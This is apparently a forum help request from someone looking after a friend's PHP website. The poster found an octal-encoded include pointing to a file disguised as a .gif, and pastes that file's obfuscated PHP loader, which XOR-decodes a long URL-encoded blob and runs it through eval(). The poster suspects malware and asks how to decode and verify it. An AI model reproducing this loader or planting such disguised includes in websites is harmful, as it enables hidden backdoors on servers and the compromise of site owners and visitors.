I'm helping out a friend with a PHP website he has been running for a few years. He is not PHP developer, so he asked if I could help him out.
I download the contents of the server files onto my laptop and found a strange hex code embedded in the top of the page
<?php @include("\164\166\163\150\157\167\163\057\151\155a\147\145\163\057so\162\164-\062\170.\147i\146");?>
This didn't look like any PHP code I'd ever scene before so I decode it and it basically said 'tvshows/images/sort-2x.gif'. And so I thought, "hmmm, that's really weird".
So when I go to the file is just PHP code. But here is the weird part. I huge file filled with URL Encoded Characters.
<?php $_c62un = basename(trim(preg_replace(rawurldecode("%2F%5C%28.%2A%24%2F"), '', __FILE__)));$_cx4pt = "~e2%1DC%5B%27%5D%02%1DNT%0A%00%06B%40%27B%08%0EA_O%3C%21a~Q%15jc%26%1A%01%1B%2B%5EW%0C%06%40%05%09%140%17%06_%5D%0A%5D%40EFCFIy%27r%11%40%0E6%15%16%1BZS%40S%00q%02%11%03%10%1A%06%1DB%5C%27Z%0E%04%03TCRD%04%09u%24%27%0C%14%01%00%00%2B_W%08A%15%1D%0F%1D%08ZD%04%09u%24%27%1A%03%070%06%1D%40W%27B%0E%04%0F%07GB%5D%16%3Fr%23m%00%00SGS%10HT%11%40%02%0DNT%09%1B%18Hm%08%5B%136%05%16%01%06%1BCF%0B%0E%40%40O~e%09y%27%12X%0EG%0D%03%15%06%1C%11%05%15%1EG%0B%0C9%03%1A%06%2BNW%16Z%08%07%12%00OUX%0D%03Q%15jckyORT%0D%16%0F%5D%00%00%01%0A%00RI%0D%15%1B%1F%03Y%05%16X%14Y%1DV%1CKJ%5DSC%5C_L%1DVM%03_ZPGXA%15%14%0BA%1F%5EN%5D~eRT%0D%12%1FB%08%0B%07%1FOV%03%5EU%11I%1E%06%5D~e%7F~%0D%12X%0E%0E%0FF%5BN%14%01CQ%0CG%08%079%16%17%1B%07YAP%09%01%00%0A%160%15%11Ym%1BA%09%1D%03%1D%1B%01S%04%1Bu%24GIFS%14%7F~%0D%12X%0EGIFS%09%07%1ANF%11A%09I%00%1A%03%17%2BJW%0Cq%04%06%08%07%0A%1C%00%5E%1A%5CV%13%00%01%09%08%5By%27%12X%0EGIFSO%09y%27%12X%0EGIFSORT%0D%12%5CE%0E%06%15%17%0E%0A%05%0D%0FXH%08%19%03%1DGV%0CY%5B%1FT%00EFQ%1DP%5D%16%3Fr%0EGIFSORT%0D%12X%0EC%1D%0E%02%18%02%15G%12E%0E%01%1B%03%12%0BZPF%5B%17%5D%03%08%1E%02CR%12D%5E%1D%5D%0E%13%03%5BK%0A%00DU%02IN%40%5D~eRT%0D%12X%0EGIFSOR%12N%5E%17%5D%02AB%18%06%1D%07IS%00_NRkyORT%0D%12X%0EGIFSO%00%11YG%0A%40GM%12%1B%1E%05%04LXC%23mIFSORT%0D%12%05%23mIFSO%0Fy%27%12X%0EG%0F%13%1D%0C%06%1DB%5CXM%10%19%09%15%19%16%5C%04%3Fr%0EGIF%08bxT%0D%12X%0EGIF%01%0A%06%01_%5CXZ%15%00%0B%5B%1F%00%11Jm%0AK%17%05%07%10%0AZV%02nP%00M5B%5CM%5ET%0A%15T%0E86%20%3A%237%2Br%1BQ%15jcFSOR%09%208u%24GIFS%09%07%1ANF%11A%09I%17%04%08%1D%0CD%5C%08%06C%1D%1F%1C%01%06%1F%40%1EX%0A%00%1D%10%0B%15%0A%1D%04%3Fr%0EGIF%08bxT%0D%12X%0EGIFW%03%05%1FK%5D%01ZGTFQMIy%27%3Fr%0EGIFSORTK%5D%0A%0EOM%1C%15%16%17%0DKY%09%13WRFW%15%14%0DHK%1EE%16IZS%1C%06%06AW%16%06C%1D%1F%1C%01%06%1F%40%1BC%07jcFSORT%0D%12XUjcFSORT%0D%12X%0EGIF%15%00%00T%05%16%0AJ%0A%13%0A%1ERBO%0D%16%0AJ%0A%13%0A%1ES%01%00_%5E%1D%40OM%01%07%19%0A%0EU%5BQ%0EAOFW%15%14%0DHK%1EE%16U%15%07%1D%1E%11C%1A%5CZ%1E%06%08%07%04%1F%5D%16%12%5C%5C%03%04%1C%1F%02Y_%01%12%5CT%01%10%03%0A%09%19%05%06%19Q%23mIFSORT%0D%12X%0EGI%1D~eRT%0D%12X%0EGIFSORT%0D%12X%0A%0B%1E%0D%15%00%0B%00%0D%1CE%0E%04%01%14%5B%00%00%10%05%16%0CW%08%07%12%18%02%29PWT%01K%1E%0F%0D%022%5BTs%12%17%5C%03AB%14%1B%04%0CWJ%11uC%1B%02%1E%15%1E%19p%1BQ%15jcFSORT%0D%12X%0EGIF%0EbxT%0D%12X%0EGIF%0Ebxy%27%12X%0EGIFSO%00%11YG%0A%40GM%0A%04%04%14%1BTFC%23mIFSO%0Fy%27%3Fr%0EGIF%15%1A%1C%17Y%5B%17%40G%03%04%01%01%02%01_%1A%5CZ%1E%06%08%07%04%1FX%0D%16%1FZ%11%11%1C%0B%06%5By%27%12X%0EG%12kyORT%0D%12X%0EG%0E%0A%1C%0D%13%18%0D%16%0F%5D%00%00%01%0A%00Iy%27%3Fr%0EGIFSORT_W%0C%5B%15%07F%02%18%15%1BU%5B%16%5EO%18%11%14%00%0A%1DCBP%0A%13%10%09%1D%1B%19%19%01%12%5CI%13%1F%1E%09%17%1B%5D%01%12%5CY%14%0E%0F%14%16%1D%5D%16%3Fr%0EGIF%0Ebxy%27%3Fr%0EGIF%15%1A%1C%17Y%5B%17%40G%00%0D%14%0B%10%1FT%1AQ%23mIFSO%09y%27%12X%0EGIFSOV%06_%5C%15O%10I%5BS%09%1B%18Hm%1FK%136%05%1C%01%06%11CF%0B%06%04%1E%16%1C%09%04%10%05%1BQ%15jcFSORT%0D%12X%0A%1E%08%15%1E%1F%08%1B%0D%0FX%5D%13%1B%16%1C%1CZP_%40%16C%06%1EJS%02%16A%05P%19%5D%02%07%07%1E%0AZ%17ZB%17H%11%0DNZF%5B%5D%16%3Fr%0EGIFSORTDTX%06C%10%07%00%02%02%0EB%12Y%13ZI%202%23%211%04%3Fr%0EGIFSORTV%3Fr%0EGIFSORT%0D%12X%0EC%0E%0C%12%04%00%1CKGX%13G%1A%13%11%1C%06%06%05%16%0A%5C%09%04%07%04CRPTS%0BC%17%13%09SDRB%19%1BC%23mIFSORT%0D%12X%0EGIB%1B%15%15%02XGX%13G%1C%08%00%0A%00%1DL%5E%11T%02A%0C%11%1D%1C%04X%40P%5C%06%1E%13%01%03%16%11N%5D%1CKOM%01%19%0E%19%06ET%0D%07KI%0B%17ZZ%16LA%1D%40%06%04%03%5B%0C%05%04BT%0EJO%40OZF%5BO%208X%0EGIFSOR%09%208X%0EGIFSOR%11AA%1D%23mIFSORT%0D%12%03%23mIFSORT%0D%12X%0EGIB%1B%15%15%02XGX%13G%28%14%01%0E%0B%5C%04%09u%24GIFSORT%0DOu%24GIFSORT%0D%40%1DZ%12%1B%08SK%1A%0EJD%0D%5B%5CdlSORTP%3Fr%23mIFSO%14%01CQ%0CG%08%07F%14%09%17%11CH%00%06C%19%0C%19%18%0B%03AKE%602%25%2AZbxT%0D%12XUjcFSORT%0D%12XH%08%1B%03%12%0C%1AT%05%5B%13I%03%0B%0D%0AG%5BTLAX%0A%00%0C%04%06%15%16%1D%0D%0FF%0EC%13%00%0A%0A%0B%12FC%16W%10%08%05%00%16%5By%27%12X%0EGIFSO%09y%27%12X%0EGIFSORT%0D%12%11HGAB%03%05%18%03TE%14WNdlSORT%0D%12X%0EGIFS%14%7F~%0D%12X%0EGIFSORT%0D%12X%0EG%00%00SG%01%00_Q%15%5EOM%16%19%05%05%0DZ%5E%01%02GM%01%16%0D%07%0EI%5BQ%0EZTFCF%7F~%0D%12X%0EGIFSORT%0D%12X%0EG%12kyORT%0D%12X%0EGIFSORT%0D%12X%0EGI%03%05%0E%1E%5C%09H%1EW%02%10%00%18%1E%1C%0DZS%1B%5D%1E%40%5D~eRT%0D%12X%0EGIFSORT%0D%12X%0EGIF%11%1D%17%15F%09u%24GIFSORT%0D%12X%0EGIFSO%0Fy%27%12X%0EGIFSORT%0D%12%05%23mIFSORT%0D%12X%0EGI%03%1F%1C%17y%27%12X%0EGIFSORT%0D%12%03%23mIFSORT%0D%12X%0EGIFSOR%11%5BS%14%06C%13%00%0A%0A%0B%12FC%16W%10%08%05%00%16%5BO%208X%0EGIFSORT%0D%12XSjcFSORT%0D%12XSjcFSOR%09%208u%24GIFS%08%14%11H%5C%02VO%40%5D~e%0F";eval(rawurldecode($_cx4pt) ^ substr(str_repeat($_c62un, (strlen($_cx4pt)/strlen($_c62un)) + 1), 0, strlen($_cx4pt)));
There's more then just this, but the rest appears to be commented out. But it is thousands of characters long.
Now I tried to decode it, but it didn't seem to make any sense to me. I uploaded the whole file to some site which said it could decode the thing, but it just returned a random .bin file.
My gut is telling me this is probably malware or possibly a virus. Any way I can verify what this is or how I can decode the enfire .gif file? Should I delete ASAP? Or is it harmless.
I know very little about security except to say this looks very suspicious to me.